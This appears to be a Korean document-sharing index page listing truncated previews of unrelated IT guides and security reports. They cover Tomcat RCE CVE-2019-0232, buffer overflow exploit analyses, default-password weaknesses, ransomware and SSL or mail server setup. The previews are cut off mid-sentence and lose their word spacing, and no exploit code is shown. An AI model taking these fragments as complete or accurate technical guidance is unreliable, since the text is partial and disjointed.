Windows 8에서 BioStar 1 설치하기 / 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar

More information

System Recovery 사용자 매뉴얼

System Recovery 사용자 매뉴얼 Samsung OS Recovery Solution 을이용하여간편하게 MagicInfo 의네트워크를설정하고시스템을백업및복원할수있습니다. 시스템시작시리모컨의 - 버튼이나키보드의 F3 키를연속해서누르면복구모드로진입한후 Samsung OS Recovery Solution 이실행됩니다. Samsung OS Recovery Solution 은키보드와리모컨을사용하여조작할수있습니다.

More information

Windows 10 General Announcement v1.0-KO

Windows 10 General Announcement v1.0-KO Windows 10 Fuji Xerox 장비와의호환성 v1.0 7 July, 2015 머리말 Microsoft 는 Windows 10 이 Windows 자동업데이트기능을통해예약되어질수있다고 6 월 1 일발표했다. 고객들은 윈도우 10 공지알림을받기 를표시하는새로운아이콘을알아차릴수있습니다. Fuji Xerox 는 Microsoft 에서가장최신운영시스템인 Windows

More information

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments

More information

*****

***** Korea Internet & Security Agency 21 2 본 보고서 내용의 전부나 일부를 인용하는 경우에는 반드시 출처 [자료:한국인터넷진흥원 인터넷침해대응센터]를 명시하여 주시기 바랍니다. CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 34 37 38 1 212 Bot

More information

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770> 개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000

More information

Apache( 단일도메인 ) SSL 인증서갱신설치가이드 본문서는주식회사한국기업보안에서 SSL 보안서버인증서설치를위해작성된문서로 주식회사한국기업보안의동의없이무단으로사용하실수없습니다. [ 고객센터 ] 한국기업보안. 유서트기술팀 Copyright 201

Apache( 단일도메인 ) SSL 인증서갱신설치가이드 본문서는주식회사한국기업보안에서 SSL 보안서버인증서설치를위해작성된문서로 주식회사한국기업보안의동의없이무단으로사용하실수없습니다. [ 고객센터 ] 한국기업보안. 유서트기술팀 Copyright 201 Apache( 단일도메인 ) SSL 인증서갱신설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 02-512-9375 1. 발급받으신인증서를해당서버폴더에업로드또는저장합니다. 설명 : [$httpd_home] = Apache 디렉토리 [root@localhost httpd]# mkdir conf.d/ssl_new [root@localhost httpd]#

More information

Copyright 2004 Sun Microsystems, Inc Network Circle, Santa Clara, CA U.S.A..,,. Sun. Sun. Berkeley BSD. UNIX X/Open Company, Ltd.. Sun, Su

Copyright 2004 Sun Microsystems, Inc Network Circle, Santa Clara, CA U.S.A..,,. Sun. Sun. Berkeley BSD. UNIX X/Open Company, Ltd.. Sun, Su Java Desktop System 2 Sun Microsystems, Inc. 4150 Network Circle Santa Clara, CA 95054 U.S.A. : 817 7757 10 2004 9 Copyright 2004 Sun Microsystems, Inc. 4150 Network Circle, Santa Clara, CA 95054 U.S.A..,,.

More information

3) MySQL data 백업백업방법 : dump 파일로저장저장위치 : /backup/mysqldump 백업주기 : 시간별 (/etc/cron.hourly) 또는일별 (/etc/cron.daily) 보관기간 : 7 일백업스크립트 : 아래예제 6-1). 참조 4) 웹데이

3) MySQL data 백업백업방법 : dump 파일로저장저장위치 : /backup/mysqldump 백업주기 : 시간별 (/etc/cron.hourly) 또는일별 (/etc/cron.daily) 보관기간 : 7 일백업스크립트 : 아래예제 6-1). 참조 4) 웹데이 Local Backup 지침 < 로컬백업지침 ver 1.0> 아래의로컬백업지침은원격백업지침의기초가됩니다. 1. 준비사항 1) 운영중인하드디스크와는별도로백업하려는 Data 용량의최소 4 배이상되는하드디스크를준비한다. 2) 백업하드디스크의용량이남을지라도백업용도외에는사용하지않는다. 3) 백업하려는데이타항목을선정하여, 백업디렉토리를트리구조화한다. 2. 백업방법 1)

More information

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월 메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. qmail, SPF 인증모듈설치

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Deep Learning 작업환경조성 & 사용법 ISL 안재원 Ubuntu 설치 작업환경조성 접속방법 사용예시 2 - ISO file Download www.ubuntu.com Ubuntu 설치 3 - Make Booting USB Ubuntu 설치 http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/

More information

INDEX 1. 개요 데이터백업스크립트작성 crontab 을이용한자동백업예약 활용 - 다른서버에백업하기

INDEX 1. 개요 데이터백업스크립트작성 crontab 을이용한자동백업예약 활용 - 다른서버에백업하기 Linux Server - Data Backup - Copyright @ 2011 Good Internet 소 속 IDC실 이 름 정명구매니저 E-mail tech@tongkni.co.kr - 1 - INDEX 1. 개요... 3 2. 데이터백업스크립트작성.... 4 3. crontab 을이용한자동백업예약.... 7 4. 활용 - 다른서버에백업하기.... 10-2

More information

작성자 : 기술지원부 김 삼 수

작성자 : 기술지원부 김 삼 수 작성자 : 기술지원부김삼수 qpopper 설치 qpopper란무엇인가? 메일수신을하기위해필요한프로그램으로 qpopper는가장인기있는 email 클라이언트에의해사용되는인터넷 email 다운로딩을위한 POP3프로토콜을사용합니다. 그러나 qpopper는 sendmail이나 smail과같이 SMTP프로토콜은포함하고있지않습니다. (

More information

<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770> 네트워크 장비의 디폴트 로그인 패스워드 취약점 및 대책 2005. 11. 30 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]룰 명시하여 주시기 바랍니다. - 1 - 1. 개요 패스워드 관리는 보안의 가장 기본적인 사항으로 유추하기 어려운 패스워드를 사용하고, 주기적 으로 패스워드를 변경하는 등 패스워드 관리에 신경을 많이 쓰고

More information

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù 21 5 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 32 35 36 2 215 Bot 1,7511,315 33.2% 1,621,468 27.7% 285 431 33.9% 295 12 6.9% 44 396 2.% 132

More information

Install stm32cubemx and st-link utility

Install stm32cubemx and st-link utility STM32CubeMX and ST-LINK Utility for STM32 Development 본문서는 ST Microelectronics 의 ARM Cortex-M 시리즈 Microcontroller 개발을위해제공되는 STM32CubeMX 와 STM32 ST-LINK Utility 프로그램의설치과정을설명합니다. 본문서는 Microsoft Windows 7

More information

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환 취약점분석보고서 [Photodex ProShow Producer v5.0.3256] 2012-07-24 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Photodex ProShow Producer Buffer Overflow 취약점분석... 2 2.1. Photodex ProShow Producer Buffer

More information

SIGIL 완벽입문

SIGIL 완벽입문 누구나 만드는 전자책 SIGIL 을 이용해 전자책을 만들기 EPUB 전자책이 가지는 단점 EPUB이라는 포맷과 제일 많이 비교되는 포맷은 PDF라는 포맷 입니다. EPUB이 나오기 전까지 전 세계에서 가장 많이 사용되던 전자책 포맷이고, 아직도 많이 사 용되기 때문이기도 한며, 또한 PDF는 종이책 출력을 위해서도 사용되기 때문에 종이책 VS

More information

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환 취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple

More information

*

* Korea Internet & Security Agency 29 12 CONTENTS 1 3 4 5 6 6 7 9 1 13 14 16 18 23 56 59 61 Windows XP SP1 Windows 2 SP4 1 2912 Bot 326 49 2.3 73 73 239 215 11.2% 256 199 28.6% 25 115 117.4% Bot 8,469 46

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 공개 SW 솔루션설치 & 활용가이드 시스템 SW > 가상화 제대로배워보자 How to Use Open Source Software Open Source Software Installation & Application Guide CONTENTS 1. 개요 2. 기능요약 3. 실행환경 4. 설치및실행 5. 기능소개 6. 활용예제 7. FAQ 8. 용어정리 - 3-1.

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 임베디드리눅스개발환경구축 Jo, Heeseung 개발환경 HBE-SM5-S4210 개발환경 타겟보드와리눅스가설치된호스트컴퓨터가필요 임베디드리눅스개발환경 - 호스트컴퓨터환경설치 - 호스트와타겟연결 - 디버그환경 호스트컴퓨터는임베디드시스템의동작을모니터링하는디버깅환경으로서의역할도수행 임베디드시스템을위한소프트웨어를개발하기위해서호스트시스템에구축하는개발환경 교차개발환경

More information

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó Korea Internet & Security Agency 21 3 CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 31 34 35 1 213 Bot 1,85 1,32 16.7 1,53 1,76 12.1 222 317 3. 116 16 9.4% 345 23 5.% 267 233 14.6%

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

슬라이드 제목 없음

슬라이드 제목 없음 < > Target cross compiler Target code Target Software Development Kit (SDK) T-Appl T-Appl T-VM Cross downloader Cross debugger Case 1) Serial line Case 2) LAN line LAN line T-OS Target debugger Host System

More information

ActFax 4.31 Local Privilege Escalation Exploit

ActFax 4.31 Local Privilege Escalation Exploit NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고

More information

MySQL-Ch10

MySQL-Ch10 10 Chapter.,,.,, MySQL. MySQL mysqld MySQL.,. MySQL. MySQL....,.,..,,.,. UNIX, MySQL. mysqladm mysqlgrp. MySQL 608 MySQL(2/e) Chapter 10 MySQL. 10.1 (,, ). UNIX MySQL, /usr/local/mysql/var, /usr/local/mysql/data,

More information

게시판 스팸 실시간 차단 시스템

게시판 스팸 실시간 차단 시스템 오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP

More information

1. efolder 시스템구성 A. DB B. apache - mod-perl - PHP C. SphinxSearch ( 검색서비스 ) D. File Storage 2. efolder 설치순서 A. DB (MySQL) B. efolder Service - efolder

1. efolder 시스템구성 A. DB B. apache - mod-perl - PHP C. SphinxSearch ( 검색서비스 ) D. File Storage 2. efolder 설치순서 A. DB (MySQL) B. efolder Service - efolder Embian efolder 설치가이드 efolder 시스템구성 efolder 설치순서 Installation commands 1. efolder 시스템구성 A. DB B. apache - mod-perl - PHP C. SphinxSearch ( 검색서비스 ) D. File Storage 2. efolder 설치순서 A. DB (MySQL) B. efolder

More information

Apache( 단일도메인 ) SSL 인증서갱신설치가이드 본문서는주식회사한국기업보안에서 SSL 보안서버인증서설치를위해작성된문서로 주식회사한국기업보안의동의없이무단으로사용하실수없습니다. [ 고객센터 ] 한국기업보안. 유서트기술팀 Copyright 201

Apache( 단일도메인 ) SSL 인증서갱신설치가이드 본문서는주식회사한국기업보안에서 SSL 보안서버인증서설치를위해작성된문서로 주식회사한국기업보안의동의없이무단으로사용하실수없습니다. [ 고객센터 ] 한국기업보안. 유서트기술팀 Copyright 201 Apache( 단일도메인 ) SSL 인증서갱신설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 02-512-9375 1. 발급받으신인증서를해당서버폴더에업로드또는저장합니다. Apache source 및 package 구분아파치경로확인명령어 : ps ef grep httpd -source: /usr/local/apache [ 경로및 apache이름은상이할수있음

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 임베디드리눅스개발환경구축 Jo, Heeseung 개발환경 HBE-SM5-S4210 개발환경 타겟보드와리눅스가설치된호스트컴퓨터가필요 임베디드리눅스개발환경 - 호스트컴퓨터환경설치 - 호스트와타겟연결 - 디버그환경 호스트컴퓨터는임베디드시스템의동작을모니터링하는디버깅환경으로서의역할도수행 임베디드시스템을위한소프트웨어를개발하기위해서호스트시스템에구축하는개발환경 교차개발환경

More information

해킹 대응 경진대회

해킹 대응 경진대회 은상 이상엽 (KT 망관리 / 지원단보안기술부 ) 정주환 (KT 망관리 / 지원단보안기술부 ) 김아영 (KT 망관리 / 지원단보안기술부 ) 최용훈 (KT 망관리 / 지원단보안기술부 ) 요약보고서 침해사고분석 * Unix 침해사고분석은로그파일분석과파일변조분석으로부터단서를찾아나가는것이일반적이기때문에일차적으로로그파일분석을시도하였으나, 원격공격로그등은특별히발견되지않았으며일부백도어나수상한메일로그만을발견함.

More information

untitled

untitled Push... 2 Push... 4 Push... 5 Push... 13 Push... 15 1 FORCS Co., LTD A Leader of Enterprise e-business Solution Push (Daemon ), Push Push Observer. Push., Observer. Session. Thread Thread. Observer ID.

More information

Microsoft Word - src.doc

Microsoft Word - src.doc IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...

More information

ESP1ºÎ-04

ESP1ºÎ-04 Chapter 04 4.1..,..,.,.,.,. RTOS(Real-Time Operating System)., RTOS.. VxWorks(www.windriver.com), psos(www.windriver.com), VRTX(www.mento. com), QNX(www.qnx.com), OSE(www.ose.com), Nucleus(www.atinudclus.

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

컴퓨터관리2번째시간

컴퓨터관리2번째시간 Company 컴퓨터 관리 참고 자료 PC 운영체제 POST 기능 :, ROM BIOS ( : [F8]) 1. Windows XP Windows XP 사용자 계정 :,,, 강화된 디지털 미디어 지원 기능 : (Windows Movie Maker), CD (Windows Media Player), Windows 홈 네트워크 기능 :, 강화된 시스템 관리 :,

More information

OnTuneV3_Agent_Install

OnTuneV3_Agent_Install OnTune Agent 설치하기 - OnTune Manager Version 3.1.6-2010-06-21 TeemStone 순서 1. Installer 를이용한 agent 설치하기 2. Windows 서버에 agent 설치하기 3. 파일에대한설명 4. 시스템재부팅시자동실행되도록설정하기 5. 직접설치하기 6. 직접실행하기 7.. Agent 종료하기 8.. Agent

More information

네이버블로그 :: 포스트내용 Print VMw are 에서 Linux 설치하기 (Centos 6.3, 리눅스 ) Linux 2013/02/23 22:52 /carrena/ VMware 에서 l

네이버블로그 :: 포스트내용 Print VMw are 에서 Linux 설치하기 (Centos 6.3, 리눅스 ) Linux 2013/02/23 22:52   /carrena/ VMware 에서 l VMw are 에서 Linux 설치하기 (Centos 6.3, 리눅스 ) Linux 2013/02/23 22:52 http://blog.naver.com /carrena/50163909320 VMware 에서 linux 설치하기 linux 는다양한버전이존재합니다. OS 자체가오픈소스이기때문에 redhat fedora, 우분투, centos 등등 100 가지가넘는버전이존재함

More information

Chap 5 루트파일시스템 (Root F/S)

Chap 5 루트파일시스템 (Root F/S) Chap 5 루트파일시스템 (Root F/S) Chap 5. 루트파일시스템 (Root F/S) 1. Root File System 1.1. Root File system Root file system이란 / 에마운트되는 file system을말한다. 리눅스시스템에서커널이기본적인운용환경을구성해주고난다음, 루트파일시스템이리눅스시스템에서사용하는유틸리티, 라이브러리등과같은부가적인요소들을제공한다.

More information

6주차.key

6주차.key 6, Process concept A program in execution Program code PCB (process control block) Program counter, registers, etc. Stack Heap Data section => global variable Process in memory Process state New Running

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 임베디드리눅스개발환경실습 Jo, Heeseung 타겟보드모니터링동작실습 호스트 PC 에서시리얼포트를통해서타겟보드를모니터링 타겟보드가프로그램을실행하는동안일어나는일을시리얼포트로메시지를출력하면호스트 PC 에서는시리얼포트를통해메시지를수신하여이를화면에출력 minicom 프로그램사용 - minicom 이정상적으로설정이되고, 타겟보드에최소한부트로더가올라간상태라면 minicom

More information

메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail spf-filter 년 6 월

메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail spf-filter 년 6 월 메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail 8.13.4 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. sendmail, SPF

More information

문서 대제목

문서 대제목 Linux OS Backup 교육자료 v1.1 2013. 12. 27. 이스턴네트웍스 기술지원팀전흥수 목차 1. Linux OS Backup & Cloning Layout 2. Solution Install & Configuration 3. Recovery Procedure 4. Reference Site - 1 - 1. Linux OS Backup / Cloning

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Chapter 05. 파일접근권한관리하기 00. 개요 01. 파일의속성 02. 파일의접근권한 03. 기호를이용한파일접근권한변경 04. 숫자를이용한파일접근권한변경 05. 기본접근권한설정 06. 특수접근권한 파일의속성을이해하고설명할수있다. 접근권한의종류와표기방법을이해하고설명할수있다. 접근권한을바꾸기위해기호모드에서원하는권한을기호로표기할수있다. 접근권한을바꾸기위해숫자모드에서원하는권한을숫자로표기할수있다.

More information

Chapter 05. 파일접근권한관리하기

Chapter 05. 파일접근권한관리하기 Chapter 05. 파일접근권한관리하기 00. 개요 01. 파일의속성 02. 파일의접근권한 03. 기호를이용한파일접근권한변경 04. 숫자를이용한파일접근권한변경 05. 기본접근권한설정 06. 특수접근권한 파일의속성을이해하고설명할수있다. 접근권한의종류와표기방법을이해하고설명할수있다. 접근권한을바꾸기위해기호모드에서원하는권한을기호로표기할수있다. 접근권한을바꾸기위해숫자모드에서원하는권한을숫자로표기할수있다.

More information

<41736D6C6F D20B9AEBCADBEE7BDC42E687770>

<41736D6C6F D20B9AEBCADBEE7BDC42E687770> IDA Remote Debugging 2007. 01. 이강석 / certlab@gmail.com http://www.asmlove.co.kr - 1 - Intro IDA Remote debugging에대해알아봅시다. 이런기능이있다는것을잘모르시는분들을위해문서를만들었습니다. IDA 기능중에분석할파일을원격에서디버깅할수있는기능이있는데먼저그림과함께예를들어설명해보도록하겠습니다.

More information

Contributors: Myung Su Seok and SeokJae Yoo Last Update: 09/25/ Introduction 2015년 8월현재전자기학분야에서가장많이쓰이고있는 simulation software는다음과같은알고리즘을사용하고있다.

Contributors: Myung Su Seok and SeokJae Yoo Last Update: 09/25/ Introduction 2015년 8월현재전자기학분야에서가장많이쓰이고있는 simulation software는다음과같은알고리즘을사용하고있다. Contributors: Myung Su Seok and SeokJae Yoo Last Update: 09/25/2015 1. Introduction 2015년 8월현재전자기학분야에서가장많이쓰이고있는 simulation software는다음과같은알고리즘을사용하고있다. 2. Installation 2.1. For Debian GNU/Linux 국내에서사용되는컴퓨터들의

More information

Network seminar.key

Network seminar.key Intro to Network .. 2 4 ( ) ( ). ?!? ~! This is ~ ( ) /,,,???? TCP/IP Application Layer Transfer Layer Internet Layer Data Link Layer Physical Layer OSI 7 TCP/IP Application Layer Transfer Layer 3 4 Network

More information

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770> i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,

More information

리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2.

리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2. 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2. 3Rabbitz Book 애플리케이션파일다운로드하여압축파일을풀고복사합니다. 3. 3Rabbitz Book 실행합니다.

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 INSTALL LINUX Jo, Heeseung DOWNLOAD PROGRAMS Download VMWare player http://www.vmware.com/products/player/playerproevaluation.html Download Ubuntu iso file http://ubuntu.com - server, 64bit version http://cslab.jbnu.ac.kr/_down/ubuntu-18.04.2-live-serveramd64.iso

More information

Mango220 Android How to compile and Transfer image to Target

Mango220 Android How to compile and Transfer image to Target Mango220 Android How to compile and Transfer image to Target http://www.mangoboard.com/ http://cafe.naver.com/embeddedcrazyboys Crazy Embedded Laboratory www.mangoboard.com cafe.naver.com/embeddedcrazyboys

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi

More information

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

개인정보보호의  이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호- 개인정보보호의 이해와 안전한 관리 - 안전한 개인정보 관리- 2013. 6. 26 최 윤 형 (한국정보화진흥원) 1 안전한 개인PC 관리방법 목 차 2 안전한 스마트폰 관리방법 1. 안전한 개인PC 관리방법 정보통신 기기의 보안 위협요인 위협요소 웜, 바이러스, 악성코드, DDos공격침입, 네트워크 공격 휴대성, 이동성 오픈 플랫폼 3G, WiFi, Wibro

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Install the PDI on CentOS 2013.04 G L O B E P O I N T 1 Ⅰ linux 구성 II Pentaho Install 2013, Globepoint Inc. All Rights Reserved. 2 I. Linux 구성 2013, Globepoint Inc. All Rights Reserved. 3 IP 설정 1. 설정파일

More information

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - postfix) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i postfix spf-filter 년 6 월

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - postfix) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i postfix spf-filter 년 6 월 메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - postfix) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i postfix 2.7.1 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. postfix,

More information

Microsoft PowerPoint - 03-Development-Environment-2.ppt

Microsoft PowerPoint - 03-Development-Environment-2.ppt 개발환경 2 임베디드시스템소프트웨어 I 차례 부트로더의기능, 컴파일방법 커널의기능, 컴파일방법 파일시스템의기능, 생성방법 Host-KIT 네트워크연결방법 (Bootp, TFTP, NFS) 개발환경 2 2 부트로더의기능 하드웨어초기화 CPU clock, Memory Timing, Interrupt, UART, GPIO 등을초기화 커널로드 커널이미지를 flash

More information

벤처연구사업(전동휠체어) 평가

벤처연구사업(전동휠체어) 평가 운영체제실습 리눅스기본명령어 2019. 4 표월성 wspyo74@naver.com cherub.sungkyul.ac.kr 목차 Ⅰ. 기본명령어 1. 시스템정보 2. 파일및디렉토리명령어 시스템정보 1. 시스템정보출력 시스템정보출력 uname - 시스템정보출력 파일및디렉토리관련 명령어 파일및디렉토리 파일 (File) - 데이터를저장하기위해사용되는객체 ( 텍스트파일,

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 1 Tizen 실습예제 : Remote Key Framework 시스템소프트웨어특론 (2014 년 2 학기 ) Sungkyunkwan University Contents 2 Motivation and Concept Requirements Design Implementation Virtual Input Device Driver 제작 Tizen Service 개발절차

More information

운영체제실습_명령어

운영체제실습_명령어 운영체제실습 리눅스네트워크기본개념및설정 서 기옥 Contents 네트워크용어정의 IP 주소 네트워크기본명령어 네트워크관리명령어 네트워크설정파일 telnet 서버설정 네트워크용어정의 네트워크 (Network) : 전자적으로데이터를주고받기위한목적으로연결된 2 개이상의컴퓨터시스템 IP 주소와 Ethernet 주소 IP 주소 : 네트워크에연결된시스템을구분하는소프트웨어적인주소

More information

최근 해킹현황 및 해킹기술

최근 해킹현황 및 해킹기술 해킹및바이러스예방 2002. 7. 26 정현철 / 한국정보보호진흥원 hcjung@certcc.or.kr Korea CERT Coordination Center Korea Information Security Agency 목차 해킹바이러스의이해 해킹바이러스현황과사례 환경변화와해킹바이러스동향 계층적인방어 사고예방 접근통제 계정 / 패스워드보안 최소한의서비스제공

More information

ㅇ악성코드 분석

